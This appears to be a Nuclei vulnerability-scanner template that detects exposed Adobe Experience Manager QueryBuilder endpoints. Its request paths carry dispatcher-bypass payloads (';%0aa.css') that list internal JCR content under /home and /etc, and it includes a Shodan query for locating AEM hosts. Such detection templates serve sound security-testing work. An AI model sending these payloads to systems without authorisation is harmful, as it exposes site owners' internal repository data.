id: aem-querybuilder-internal-path-read

info:
  name: AEM QueryBuilder Internal Path Read
  author: DhiyaneshDk
  severity: medium
  description: AEM QueryBuilder is vulnerable to LFI.
  reference:
    - https://speakerdeck.com/0ang3el/aem-hacker-approaching-adobe-experience-manager-webapps-in-bug-bounty-programs?slide=91
  metadata:
    max-request: 4
    shodan-query: http.component:"Adobe Experience Manager"
  tags: aem,misconfig

http:
  - method: GET
    path:
      - '{{BaseURL}}/bin/querybuilder.json.;%0aa.css?path=/home&p.hits=full&p.limit=-1'
      - '{{BaseURL}}/bin/querybuilder.json.;%0aa.css?path=/etc&p.hits=full&p.limit=-1'
      - '{{BaseURL}}/bin/querybuilder.json.css?path=/home&p.hits=full&p.limit=-1'
      - '{{BaseURL}}/bin/querybuilder.json.css?path=/etc&p.hits=full&p.limit=-1'

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - 'jcr:path'
          - 'success'
        condition: and
# digest: 4b0a00483046022100f6628f96cb4d633f700b66bc68bbff50e14437f1a7206af406d989d8e89b4943022100a70d967a5e148a69a9c18bdf1374c0f56e87283969a4ddc38eb81b9aa0af0421:922c64590222798bb761d5b6d8e72950